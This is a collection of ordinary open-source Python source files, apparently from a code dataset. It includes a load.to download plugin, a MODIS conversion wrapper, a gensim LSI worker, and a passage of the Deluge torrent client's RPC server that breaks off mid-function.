if os.path.isfile(carpeta+'/'+ar):
personaje = c.abrir_json(carpeta+'/'+ar)
nom.append(personaje['nombre']+' ('+imprimir_clases(personaje['cla'],s.CLASES)+')')
ars.append(ar)
sel = subselector(prompt,nom,True)
data = c.abrir_json(carpeta+'/'+ars[sel])
return data
def menu ():
while True:
opciones = [t('Crear un nuevo personaje'),
t('Avanzar un personaje existente'),
t('Editar preferencias'),
t('Salir'),
'\n'+t('Ver licencia')]
intro.imprimir_titulo()
intro.introduccion()
print(t('Elije una opción'))
op = subselector(t('Opción'),opciones)
        if op == 0: # Create a new character (Pj)
import func.core.chargen
Pj.nuevo_pj()
func.core.chargen.go()
        elif op == 1: # Advance an existing character (Pj)
import func.core.chargen
Pj.cargar_pj(cargar_archivo('Personaje','Guardar'))
func.core.chargen.go()
        elif op == 2: # preferences
c.preferencias(c.abrir_json('config.json'))
elif op == 3: # exit
break
elif op == 4:
intro.licencia('LICENSE.txt')
input(t('\n[Presione Enter para continuar]\n'))
if __name__ == '__main__':
os.system(['clear','cls'][os.name == 'nt'])
menu()
| mit | -6,750,891,117,660,819,000 | 32.166667 | 95 | 0.532249 | false |
fzimmermann89/pyload | module/plugins/hoster/LoadTo.py | 1 | 2129 | # -*- coding: utf-8 -*-
#
# Test links:
# http://www.load.to/JWydcofUY6/random.bin
# http://www.load.to/oeSmrfkXE/random100.bin
import re
from module.plugins.captcha.SolveMedia import SolveMedia
from module.plugins.internal.SimpleHoster import SimpleHoster, create_getInfo
class LoadTo(SimpleHoster):
__name__ = "LoadTo"
__type__ = "hoster"
__version__ = "0.26"
__status__ = "testing"
__pattern__ = r'http://(?:www\.)?load\.to/\w+'
__config__ = [("activated" , "bool", "Activated" , True),
("use_premium", "bool", "Use premium account if available", True)]
__description__ = """Load.to hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("halfman", "[email protected]"),
("stickell", "[email protected]")]
NAME_PATTERN = r'<h1>(?P<N>.+?)</h1>'
SIZE_PATTERN = r'Size: (?P<S>[\d.,]+) (?P<U>[\w^_]+)'
OFFLINE_PATTERN = r'>Can\'t find file'
LINK_FREE_PATTERN = r'<form method="post" action="(.+?)"'
WAIT_PATTERN = r'type="submit" value="Download \((\d+)\)"'
URL_REPLACEMENTS = [(r'(\w)$', r'\1/')]
def setup(self):
self.multiDL = True
self.chunk_limit = 1
def handle_free(self, pyfile):
#: Search for Download URL
m = re.search(self.LINK_FREE_PATTERN, self.html)
if m is None:
self.error(_("LINK_FREE_PATTERN not found"))
self.link = m.group(1)
#: Set Timer - may be obsolete
m = re.search(self.WAIT_PATTERN, self.html)
if m is not None:
self.wait(m.group(1))
#: Load.to is using solvemedia captchas since ~july 2014:
solvemedia = SolveMedia(self)
captcha_key = solvemedia.detect_key()
if captcha_key:
response, challenge = solvemedia.challenge(captcha_key)
self.download(self.link,
post={'adcopy_challenge': challenge,
'adcopy_response' : response,
'returnUrl' : pyfile.url})
getInfo = create_getInfo(LoadTo)
| gpl-3.0 | 2,512,844,144,708,544,500 | 29.855072 | 85 | 0.542508 | false |
SUNET/eduid-webapp | src/eduid_webapp/idp/tou_action.py | 1 | 2992 | #
# Copyright (c) 2015 NORDUnet A/S
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# 3. Neither the name of the NORDUnet nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
__author__ = 'eperez'
from typing import Optional
from eduid_common.session.logindata import SSOLoginData
from eduid_userdb.actions import Action
from eduid_userdb.idp import IdPUser
from eduid_webapp.idp.app import current_idp_app as current_app
def add_actions(user: IdPUser, ticket: SSOLoginData) -> Optional[Action]:
"""
Add an action requiring the user to accept a new version of the Terms of Use,
in case the IdP configuration points to a version the user hasn't accepted.
This function is called by the IdP when it iterates over all the registered
action plugins entry points.
:param user: the authenticating user
:param ticket: the SSO login data
"""
version = current_app.conf.tou_version
interval = current_app.conf.tou_reaccept_interval
if user.tou.has_accepted(version, interval):
current_app.logger.debug(f'User has already accepted ToU version {version!r}')
return None
if not current_app.actions_db:
current_app.logger.warning('No actions_db - aborting ToU action')
return None
if current_app.actions_db.has_actions(user.eppn, action_type='tou', params={'version': version}):
return None
current_app.logger.debug(f'User must accept ToU version {version!r}')
return current_app.actions_db.add_action(user.eppn, action_type='tou', preference=100, params={'version': version})
| bsd-3-clause | 7,871,357,113,988,800,000 | 41.742857 | 119 | 0.739973 | false |
robin-lai/DensityPeakCluster | plot.py | 1 | 1965 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import logging
import numpy as np
from cluster import *
from sklearn import manifold
from plot_utils import *
def plot_rho_delta(rho, delta):
'''
Plot scatter diagram for rho-delta points
Args:
rho : rho list
delta : delta list
'''
logger.info("PLOT: rho-delta plot")
plot_scatter_diagram(0, rho[1:], delta[1:], x_label='rho', y_label='delta', title='rho-delta')
def plot_cluster(cluster):
'''
Plot scatter diagram for final points that using multi-dimensional scaling for data
Args:
cluster : DensityPeakCluster object
'''
logger.info("PLOT: cluster result, start multi-dimensional scaling")
dp = np.zeros((cluster.max_id, cluster.max_id), dtype = np.float32)
cls = []
for i in xrange(1, cluster.max_id):
for j in xrange(i + 1, cluster.max_id + 1):
dp[i - 1, j - 1] = cluster.distances[(i, j)]
dp[j - 1, i - 1] = cluster.distances[(i, j)]
cls.append(cluster.cluster[i])
cls.append(cluster.cluster[cluster.max_id])
cls = np.array(cls, dtype = np.float32)
fo = open(r'./tmp.txt', 'w')
fo.write('\n'.join(map(str, cls)))
fo.close()
seed = np.random.RandomState(seed=3)
mds = manifold.MDS(max_iter=200, eps=1e-4, n_init=1)
dp_mds = mds.fit_transform(dp)
logger.info("PLOT: end mds, start plot")
plot_scatter_diagram(1, dp_mds[:, 0], dp_mds[:, 1], title='cluster', style_list = cls)
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
dpcluster = DensityPeakCluster()
# dpcluster.local_density(load_paperdata, './example_distances.dat')
# plot_rho_delta(rho, delta) #plot to choose the threthold
rho, delta, nneigh = dpcluster.cluster(load_paperdata, './data/data_in_paper/example_distances.dat', 20, 0.1)
logger.info(str(len(dpcluster.ccenter)) + ' center as below')
for idx, center in dpcluster.ccenter.items():
logger.info('%d %f %f' %(idx, rho[center], delta[center]))
plot_cluster(dpcluster) | mit | -2,970,879,158,770,166,000 | 34.107143 | 110 | 0.679389 | false |
samantp/gensimPy3 | gensim/models/lsi_worker.py | 1 | 3221 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010 Radim Rehurek <[email protected]>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
USAGE: %(program)s
Worker ("slave") process used in computing distributed LSI. Run this script \
on every node in your cluster. If you wish, you may even run it multiple times \
on a single machine, to make better use of multiple cores (just beware that \
memory footprint increases accordingly).
Example: python -m gensim.models.lsi_worker
"""
import os, sys, logging
import threading
import tempfile
from gensim.models import lsimodel
from gensim import utils
logger = logging.getLogger('gensim.models.lsi_worker')
SAVE_DEBUG = 0 # save intermediate models after every SAVE_DEBUG updates (0 for never)
class Worker(object):
def __init__(self):
self.model = None
def initialize(self, myid, dispatcher, **model_params):
self.lock_update = threading.Lock()
self.jobsdone = 0 # how many jobs has this worker completed?
self.myid = myid # id of this worker in the dispatcher; just a convenience var for easy access/logging TODO remove?
self.dispatcher = dispatcher
logger.info("initializing worker #%s" % myid)
self.model = lsimodel.LsiModel(**model_params)
def requestjob(self):
"""
Request jobs from the dispatcher in an infinite loop. The requests are
blocking, so if there are no jobs available, the thread will wait.
"""
if self.model is None:
raise RuntimeError("worker must be initialized before receiving jobs")
job = self.dispatcher.getjob(self.myid) # blocks until a new job is available from the dispatcher
logger.info("worker #%s received job #%i" % (self.myid, self.jobsdone))
self.processjob(job)
self.dispatcher.jobdone(self.myid)
@utils.synchronous('lock_update')
def processjob(self, job):
self.model.add_documents(job)
self.jobsdone += 1
if SAVE_DEBUG and self.jobsdone % SAVE_DEBUG == 0:
fname = os.path.join(tempfile.gettempdir(), 'lsi_worker.pkl')
self.model.save(fname)
@utils.synchronous('lock_update')
def getstate(self):
logger.info("worker #%i returning its state after %s jobs" %
(self.myid, self.jobsdone))
assert isinstance(self.model.projection, lsimodel.Projection)
result = self.model.projection
self.model.projection = self.model.projection.empty_like()
return result
def exit(self):
logger.info("terminating worker #%i" % self.myid)
os._exit(0)
#endclass Worker
def main():
logging.basicConfig(format = '%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
logger.info("running %s" % " ".join(sys.argv))
program = os.path.basename(sys.argv[0])
# make sure we have enough cmd line parameters
if len(sys.argv) < 1:
print(globals()["__doc__"] % locals())
sys.exit(1)
utils.pyro_daemon('gensim.lsi_worker', Worker(), random_suffix=True)
logger.info("finished running %s" % program)
if __name__ == '__main__':
main()
| gpl-3.0 | -6,709,509,564,474,837,000 | 29.971154 | 123 | 0.656007 | false |
gilliM/MFQ | ModisFromQgis/mypymodis/convertmodis.py | 1 | 9852 | #!/usr/bin/env python
# class to convert/process modis data
#
# (c) Copyright Luca Delucchi 2010
# Authors: Luca Delucchi
# Email: luca dot delucchi at iasma dot it
#
##################################################################
#
# This MODIS Python class is licensed under the terms of GNU GPL 2.
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
##################################################################
"""Convert MODIS HDF file to GeoTiff file or create a HDF mosaic file for
several tiles using Modis Reprojection Tools.
Classes:
* :class:`convertModis`
* :class:`createMosaic`
* :class:`processModis`
Functions:
* :func:`checkMRTpath`
"""
# to be compliant with python 3
from __future__ import print_function
import os
import sys
def checkMRTpath(mrtpath):
"""Function to check if MRT path it correct
:param str mrtpath: the path to MRT directory
:return: The path to 'bin' and 'data' directory inside MRT path
"""
if os.path.exists(mrtpath):
if os.path.exists(os.path.join(mrtpath, 'bin')):
mrtpathbin = os.path.join(mrtpath, 'bin')
os.environ['PATH'] = "{path}:{data}".format(path=os.environ['PATH'],
data=os.path.join(mrtpath, 'data'))
else:
raise IOError('The path {path} does not exist'.format(path=os.path.join(mrtpath, 'bin')))
if os.path.exists(os.path.join(mrtpath, 'data')):
mrtpathdata = os.path.join(mrtpath, 'data')
os.environ['MRTDATADIR'] = os.path.join(mrtpath, 'data')
else:
raise IOError('The path {path} does not exist'.format(path=os.path.join(mrtpath, 'data')))
else:
raise IOError('The path {name} does not exist'.format(name=mrtpath))
return mrtpathbin, mrtpathdata
class convertModis:
"""A class to convert modis data from hdf to tif using resample
(from MRT tools)
:param str hdfname: the full path to the hdf file
:param str confile: the full path to the paramater file
:param str mrtpath: the full path to mrt directory which contains
the bin and data directories
"""
def __init__(self, hdfname, confile, mrtpath):
"""Initialization function"""
# check if the hdf file exists
if os.path.exists(hdfname):
self.name = hdfname
else:
raise IOError('{name} does not exist'.format(name=hdfname))
# check if confile exists
if os.path.exists(confile):
self.conf = confile
else:
raise IOError('{name} does not exist'.format(name=confile))
# check if mrtpath and subdirectories exists and set environment
# variables
self.mrtpathbin, self.mrtpathdata = checkMRTpath(mrtpath)
def executable(self):
"""Return the executable of resample MRT software"""
if sys.platform.count('linux') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'resample')):
return os.path.join(self.mrtpathbin, 'resample')
elif sys.platform.count('win32') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'resample.exe')):
return os.path.join(self.mrtpathbin, 'resample.exe')
def run(self):
"""Exec the convertion process"""
import subprocess
execut = self.executable()
if not os.path.exists(execut):
raise IOError('The path {name} does not exist: it could be an '
'erroneus path or software'.format(name=execut))
else:
subprocess.call([execut, '-p', self.conf])
return "The hdf file {name} was converted successfully".format(name=self.name)
class createMosaic:
"""A class to convert several MODIS tiles into a mosaic
:param str listfile: the path to file with the list of HDF MODIS
file
:param str outprefix: the prefix for output files
:param str mrtpath: the full path to mrt directory which contains
the bin and data directories
:param str subset: a string composed by 1 and 0 according with the
layer to mosaic. The string should something like
'1 0 1 0 0 0 0'
"""
def __init__(self, listfile, outprefix, mrtpath, subset=False):
"""Function to initialize the object"""
import tempfile
# check if the hdf file exists
if os.path.exists(listfile):
self.basepath = os.path.split(listfile)[0]
self.fullpath = os.path.realpath(self.basepath)
self.listfiles = listfile
self.tmplistfiles = open(os.path.join(tempfile.gettempdir(),
'{name}.prm'.format(name=str(os.getpid()))), 'w')
self.HDFfiles = open(listfile).readlines()
else:
raise IOError('{name} not exists'.format(name=listfile))
# check if mrtpath and subdirectories exists and set environment
# variables
self.mrtpathbin, self.mrtpathdata = checkMRTpath(mrtpath)
self.out = os.path.join(self.basepath, outprefix + '.hdf')
self.outxml = self.out + '.xml'
self.subset = subset
def write_mosaic_xml(self):
"""Write the XML metadata file for MODIS mosaic"""
from parsemodis import parseModisMulti
listHDF = []
for i in self.HDFfiles:
if i.find(self.basepath) == -1 and i.find('.hdf.xml') == -1:
print("Attention: maybe you do not have the full path in the"
" HDF file list")
listHDF.append(os.path.join(self.basepath, i.strip()))
self.tmplistfiles.write("{name}\n".format(name=os.path.join(self.basepath, i.strip())))
elif i.find('.hdf.xml') == -1:
listHDF.append(i.strip())
self.tmplistfiles.write("{name}\n".format(name=os.path.join(self.fullpath, i.strip())))
pmm = parseModisMulti(listHDF)
pmm.writexml(self.outxml)
self.tmplistfiles.close()
def executable(self):
"""Return the executable of mrtmosaic MRT software"""
if sys.platform.count('linux'):
if os.path.exists(os.path.join(self.mrtpathbin, 'mrtmosaic')):
return os.path.join(self.mrtpathbin, 'mrtmosaic')
elif sys.platform.count('win32'):
if os.path.exists(os.path.join(self.mrtpathbin, 'mrtmosaic.exe')):
return os.path.join(self.mrtpathbin, 'mrtmosaic.exe')
def run(self):
"""Exect the mosaic process"""
import subprocess
execut = self.executable()
if not os.path.exists(execut):
raise IOError('The path {name} does not exist, it could be an '
'erroneus path or software'.format(name=execut))
else:
self.write_mosaic_xml()
if self.subset:
subprocess.call([execut, '-i', self.tmplistfiles.name, '-o',
self.out, '-s', self.subset],
stderr=subprocess.STDOUT)
else:
subprocess.call([execut, '-i', self.tmplistfiles.name, '-o',
self.out], stderr=subprocess.STDOUT)
return "The mosaic file {name} has been created".format(name=self.out)
class processModis:
"""A class to process raw modis data from hdf to tif using swath2grid
(from MRT Swath tools)
:param str hdfname: the full path to the hdf file
:param str confile: the full path to the paramater file
:param str mrtpath: the full path to mrt directory which contains
the bin and data directories
"""
def __init__(self, hdfname, confile, mrtpath):
"""Function to initialize the object"""
# check if the hdf file exists
if os.path.exists(hdfname):
self.name = hdfname
else:
raise IOError('%s does not exist' % hdfname)
# check if confile exists
if os.path.exists(confile):
self.conf = confile
else:
raise IOError('%s does not exist' % confile)
# check if mrtpath and subdirectories exists and set environment
# variables
self.mrtpathbin, self.mrtpathdata = checkMRTpath(mrtpath)
def executable(self):
"""Return the executable of resample MRT software"""
if sys.platform.count('linux') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'swath2grid')):
return os.path.join(self.mrtpathbin, 'swath2grid')
elif sys.platform.count('win32') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'swath2grid.exe')):
return os.path.join(self.mrtpathbin, 'swath2grid.exe')
def run(self):
"""Exec the convertion process"""
import subprocess
execut = self.executable()
if not os.path.exists(execut):
raise IOError('The path {name} does not exist, it could be an '
'erroneus path or software'.format(name=execut))
else:
subprocess.call([execut, '-pf={name}'.format(name=self.conf)])
return "The hdf file {name} has been converted".format(name=self.name)
| gpl-2.0 | 3,430,796,322,326,660,000 | 41.649351 | 103 | 0.593991 | false |
ratoaq2/deluge | deluge/core/rpcserver.py | 1 | 21636 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2008,2009 Andrew Resch <[email protected]>
#
# This file is part of Deluge and is licensed under GNU General Public License 3.0, or later, with
# the additional special exception to link portions of this program with the OpenSSL library.
# See LICENSE for more details.
#
"""RPCServer Module"""
from __future__ import unicode_literals
import logging
import os
import stat
import sys
import traceback
from collections import namedtuple
from types import FunctionType
from OpenSSL import SSL, crypto
from twisted.internet import defer, reactor
from twisted.internet.protocol import Factory, connectionDone
import deluge.component as component
import deluge.configmanager
from deluge.core.authmanager import AUTH_LEVEL_ADMIN, AUTH_LEVEL_DEFAULT, AUTH_LEVEL_NONE
from deluge.error import DelugeError, IncompatibleClient, NotAuthorizedError, WrappedException, _ClientSideRecreateError
from deluge.event import ClientDisconnectedEvent
from deluge.transfer import DelugeTransferProtocol
RPC_RESPONSE = 1
RPC_ERROR = 2
RPC_EVENT = 3
log = logging.getLogger(__name__)
def export(auth_level=AUTH_LEVEL_DEFAULT):
"""
Decorator function to register an object's method as an RPC. The object
will need to be registered with an :class:`RPCServer` to be effective.
:param func: the function to export
:type func: function
:param auth_level: the auth level required to call this method
:type auth_level: int
"""
def wrap(func, *args, **kwargs):
func._rpcserver_export = True
func._rpcserver_auth_level = auth_level
doc = func.__doc__
func.__doc__ = '**RPC Exported Function** (*Auth Level: %s*)\n\n' % auth_level
if doc:
func.__doc__ += doc
return func
if isinstance(auth_level, FunctionType):
func = auth_level
auth_level = AUTH_LEVEL_DEFAULT
return wrap(func)
else:
return wrap
def format_request(call):
"""
Format the RPCRequest message for debug printing
:param call: the request
:type call: a RPCRequest
:returns: a formatted string for printing
:rtype: str
"""
try:
s = call[1] + '('
if call[2]:
s += ', '.join([str(x) for x in call[2]])
if call[3]:
if call[2]:
s += ', '
s += ', '.join([key + '=' + str(value) for key, value in call[3].items()])
s += ')'
except UnicodeEncodeError:
return 'UnicodeEncodeError, call: %s' % call
else:
return s
class ServerContextFactory(object):
def getContext(self): # NOQA: N802
"""
Create an SSL context.
This loads the servers cert/private key SSL files for use with the
SSL transport.
"""
ssl_dir = deluge.configmanager.get_config_dir('ssl')
ctx = SSL.Context(SSL.SSLv23_METHOD)
ctx.set_options(SSL.OP_NO_SSLv2 | SSL.OP_NO_SSLv3)
ctx.use_certificate_file(os.path.join(ssl_dir, 'daemon.cert'))
ctx.use_privatekey_file(os.path.join(ssl_dir, 'daemon.pkey'))
return ctx
class DelugeRPCProtocol(DelugeTransferProtocol):
def __init__(self):
super(DelugeRPCProtocol, self).__init__()
# namedtuple subclass with auth_level, username for the connected session.
self.AuthLevel = namedtuple('SessionAuthlevel', 'auth_level, username')
def message_received(self, request):
"""
This method is called whenever a message is received from a client. The
only message that a client sends to the server is a RPC Request message.
If the RPC Request message is valid, then the method is called in
:meth:`dispatch`.
:param request: the request from the client.
:type data: tuple
"""
if not isinstance(request, tuple):
log.debug('Received invalid message: type is not tuple')
return
if len(request) < 1:
log.debug('Received invalid message: there are no items')
return
for call in request:
if len(call) != 4:
log.debug('Received invalid rpc request: number of items '
'in request is %s', len(call))
continue
# log.debug('RPCRequest: %s', format_request(call))
reactor.callLater(0, self.dispatch, *call)
def sendData(self, data): # NOQA: N802
"""
Sends the data to the client.
:param data: the object that is to be sent to the client. This should
be one of the RPC message types.
:type data: object
"""
try:
self.transfer_message(data)
except Exception as ex:
log.warn('Error occurred when sending message: %s.', ex)
log.exception(ex)
raise
def connectionMade(self): # NOQA: N802
"""
This method is called when a new client connects.
"""
peer = self.transport.getPeer()
log.info('Deluge Client connection made from: %s:%s',
peer.host, peer.port)
# Set the initial auth level of this session to AUTH_LEVEL_NONE
self.factory.authorized_sessions[
self.transport.sessionno] = self.AuthLevel(AUTH_LEVEL_NONE, '')
def connectionLost(self, reason=connectionDone): # NOQA: N802
"""
This method is called when the client is disconnected.
:param reason: the reason the client disconnected.
:type reason: str
"""
# We need to remove this session from various dicts
del self.factory.authorized_sessions[self.transport.sessionno]
if self.transport.sessionno in self.factory.session_protocols:
del self.factory.session_protocols[self.transport.sessionno]
if self.transport.sessionno in self.factory.interested_events:
del self.factory.interested_events[self.transport.sessionno]
if self.factory.state == 'running':
component.get('EventManager').emit(ClientDisconnectedEvent(self.factory.session_id))
log.info('Deluge client disconnected: %s', reason.value)
def valid_session(self):
return self.transport.sessionno in self.factory.authorized_sessions
def dispatch(self, request_id, method, args, kwargs):
"""
This method is run when a RPC Request is made. It will run the local method
and will send either a RPC Response or RPC Error back to the client.
:param request_id: the request_id from the client (sent in the RPC Request)
:type request_id: int
:param method: the local method to call. It must be registered with
the :class:`RPCServer`.
:type method: str
:param args: the arguments to pass to `method`
:type args: list
:param kwargs: the keyword-arguments to pass to `method`
:type kwargs: dict
"""
def send_error():
"""
Sends an error response with the contents of the exception that was raised.
"""
exceptionType, exceptionValue, dummy_exceptionTraceback = sys.exc_info()
formated_tb = traceback.format_exc()
try:
self.sendData((
RPC_ERROR,
request_id,
exceptionType.__name__,
exceptionValue._args,
exceptionValue._kwargs,
formated_tb
))
except AttributeError:
# This is not a deluge exception (object has no attribute '_args), let's wrap it
log.warning('An exception occurred while sending RPC_ERROR to '
'client. Wrapping it and resending. Error to '
'send(causing exception goes next):\n%s', formated_tb)
try:
raise WrappedException(str(exceptionValue), exceptionType.__name__, formated_tb)
except WrappedException:
send_error()
except Exception as ex:
log.error('An exception occurred while sending RPC_ERROR to client: %s', ex)
if method == 'daemon.info':
# This is a special case and used in the initial connection process
self.sendData((RPC_RESPONSE, request_id, deluge.common.get_version()))
return
elif method == 'daemon.login':
# This is a special case and used in the initial connection process
# We need to authenticate the user here
log.debug('RPC dispatch daemon.login')
try:
client_version = kwargs.pop('client_version', None)
if client_version is None:
raise IncompatibleClient(deluge.common.get_version())
ret = component.get('AuthManager').authorize(*args, **kwargs)
if ret:
self.factory.authorized_sessions[
self.transport.sessionno] = self.AuthLevel(ret, args[0])
self.factory.session_protocols[self.transport.sessionno] = self
except Exception as ex:
send_error()
if not isinstance(ex, _ClientSideRecreateError):
log.exception(ex)
else:
self.sendData((RPC_RESPONSE, request_id, (ret)))
if not ret:
self.transport.loseConnection()
return
# Anything below requires a valid session
if not self.valid_session():
return
if method == 'daemon.set_event_interest':
log.debug('RPC dispatch daemon.set_event_interest')
# This special case is to allow clients to set which events they are
# interested in receiving.
# We are expecting a sequence from the client.
try:
if self.transport.sessionno not in self.factory.interested_events:
self.factory.interested_events[self.transport.sessionno] = []
self.factory.interested_events[self.transport.sessionno].extend(args[0])
except Exception:
send_error()
else:
self.sendData((RPC_RESPONSE, request_id, (True)))
return
if method not in self.factory.methods:
try:
# Raise exception to be sent back to client
raise AttributeError('RPC call on invalid function: %s' % method)
except AttributeError:
send_error()
return
log.debug('RPC dispatch %s', method)
try:
method_auth_requirement = self.factory.methods[method]._rpcserver_auth_level
auth_level = self.factory.authorized_sessions[self.transport.sessionno].auth_level
if auth_level < method_auth_requirement:
# This session is not allowed to call this method
log.debug('Session %s is attempting an unauthorized method call!',
self.transport.sessionno)
raise NotAuthorizedError(auth_level, method_auth_requirement)
# Set the session_id in the factory so that methods can know
# which session is calling it.
self.factory.session_id = self.transport.sessionno
ret = self.factory.methods[method](*args, **kwargs)
except Exception as ex:
send_error()
# Don't bother printing out DelugeErrors, because they are just
# for the client
if not isinstance(ex, DelugeError):
log.exception('Exception calling RPC request: %s', ex)
else:
# Check if the return value is a deferred, since we'll need to
# wait for it to fire before sending the RPC_RESPONSE
if isinstance(ret, defer.Deferred):
def on_success(result):
try:
self.sendData((RPC_RESPONSE, request_id, result))
except Exception:
send_error()
return result
def on_fail(failure):
try:
failure.raiseException()
except Exception:
send_error()
return failure
ret.addCallbacks(on_success, on_fail)
else:
self.sendData((RPC_RESPONSE, request_id, ret))
class RPCServer(component.Component):
"""
This class is used to handle rpc requests from the client. Objects are
registered with this class and their methods are exported using the export
decorator.
:param port: the port the RPCServer will listen on
:type port: int
:param interface: the interface to listen on, this may override the `allow_remote` setting
:type interface: str
:param allow_remote: set True if the server should allow remote connections
:type allow_remote: bool
:param listen: if False, will not start listening.. This is only useful in Classic Mode
:type listen: bool
"""
def __init__(self, port=58846, interface='', allow_remote=False, listen=True):
component.Component.__init__(self, 'RPCServer')
self.factory = Factory()
self.factory.protocol = DelugeRPCProtocol
self.factory.session_id = -1
self.factory.state = 'running'
# Holds the registered methods
self.factory.methods = {}
# Holds the session_ids and auth levels
self.factory.authorized_sessions = {}
# Holds the protocol objects with the session_id as key
self.factory.session_protocols = {}
# Holds the interested event list for the sessions
self.factory.interested_events = {}
self.listen = listen
if not listen:
return
if allow_remote:
hostname = ''
else:
hostname = 'localhost'
if interface:
hostname = interface
log.info('Starting DelugeRPC server %s:%s', hostname, port)
# Check for SSL keys and generate some if needed
check_ssl_keys()
try:
reactor.listenSSL(port, self.factory, ServerContextFactory(), interface=hostname)
except Exception as ex:
log.debug('Daemon already running or port not available.: %s', ex)
raise
def register_object(self, obj, name=None):
"""
Registers an object to export it's rpc methods. These methods should
be exported with the export decorator prior to registering the object.
:param obj: the object that we want to export
:type obj: object
:param name: the name to use, if None, it will be the class name of the object
:type name: str
"""
if not name:
name = obj.__class__.__name__.lower()
for d in dir(obj):
if d[0] == '_':
continue
if getattr(getattr(obj, d), '_rpcserver_export', False):
log.debug('Registering method: %s', name + '.' + d)
self.factory.methods[name + '.' + d] = getattr(obj, d)
def deregister_object(self, obj):
"""
Deregisters an objects exported rpc methods.
:param obj: the object that was previously registered
"""
for key, value in self.factory.methods.items():
if value.__self__ == obj:
del self.factory.methods[key]
def get_object_method(self, name):
"""
Returns a registered method.
:param name: the name of the method, usually in the form of 'object.method'
:type name: str
:returns: method
:raises KeyError: if `name` is not registered
"""
return self.factory.methods[name]
def get_method_list(self):
"""
Returns a list of the exported methods.
:returns: the exported methods
:rtype: list
"""
return list(self.factory.methods)
def get_session_id(self):
"""
Returns the session id of the current RPC.
:returns: the session id, this will be -1 if no connections have been made
:rtype: int
"""
return self.factory.session_id
def get_session_user(self):
"""
Returns the username calling the current RPC.
:returns: the username of the user calling the current RPC
:rtype: string
"""
if not self.listen:
return 'localclient'
session_id = self.get_session_id()
if session_id > -1 and session_id in self.factory.authorized_sessions:
return self.factory.authorized_sessions[session_id].username
else:
# No connections made yet
return ''
def get_session_auth_level(self):
"""
Returns the auth level of the user calling the current RPC.
:returns: the auth level
:rtype: int
"""
if not self.listen or not self.is_session_valid(self.get_session_id()):
return AUTH_LEVEL_ADMIN
return self.factory.authorized_sessions[self.get_session_id()].auth_level
def get_rpc_auth_level(self, rpc):
"""
Returns the auth level requirement for an exported rpc.
:returns: the auth level
:rtype: int
"""
return self.factory.methods[rpc]._rpcserver_auth_level
def is_session_valid(self, session_id):
"""
Checks if the session is still valid, eg, if the client is still connected.
:param session_id: the session id
:type session_id: int
:returns: True if the session is valid
:rtype: bool
"""
return session_id in self.factory.authorized_sessions
def emit_event(self, event):
"""
Emits the event to interested clients.
:param event: the event to emit
:type event: :class:`deluge.event.DelugeEvent`
"""
log.debug('intevents: %s', self.factory.interested_events)
# Find sessions interested in this event
for session_id, interest in self.factory.interested_events.items():
if event.name in interest:
log.debug('Emit Event: %s %s', event.name, event.args)
# This session is interested so send a RPC_EVENT
self.factory.session_protocols[session_id].sendData(
(RPC_EVENT, event.name, event.args)
)
def emit_event_for_session_id(self, session_id, event):
"""
Emits the event to specified session_id.
:param session_id: the event to emit
:type session_id: int
:param event: the event to emit
:type event: :class:`deluge.event.DelugeEvent`
"""
if not self.is_session_valid(session_id):
log.debug('Session ID %s is not valid. Not sending event "%s".', session_id, event.name)
return
if session_id not in self.factory.interested_events:
log.debug('Session ID %s is not interested in any events. Not sending event "%s".',
session_id, event.name)
return
if event.name not in self.factory.interested_events[session_id]:
log.debug('Session ID %s is not interested in event "%s". Not sending it.', session_id, event.name)
return
log.debug('Sending event "%s" with args "%s" to session id "%s".',
event.name, event.args, session_id)
self.factory.session_protocols[session_id].sendData((RPC_EVENT, event.name, event.args))
def stop(self):
self.factory.state = 'stopping'
def check_ssl_keys():
"""
Check for SSL cert/key and create them if necessary
"""
ssl_dir = deluge.configmanager.get_config_dir('ssl')
if not os.path.exists(ssl_dir):
# The ssl folder doesn't exist so we need to create it
os.makedirs(ssl_dir)
generate_ssl_keys()
else:
for f in ('daemon.pkey', 'daemon.cert'):
if not os.path.exists(os.path.join(ssl_dir, f)):
generate_ssl_keys()
break
def generate_ssl_keys():
"""
This method generates a new SSL key/cert.
"""
from deluge.common import PY2
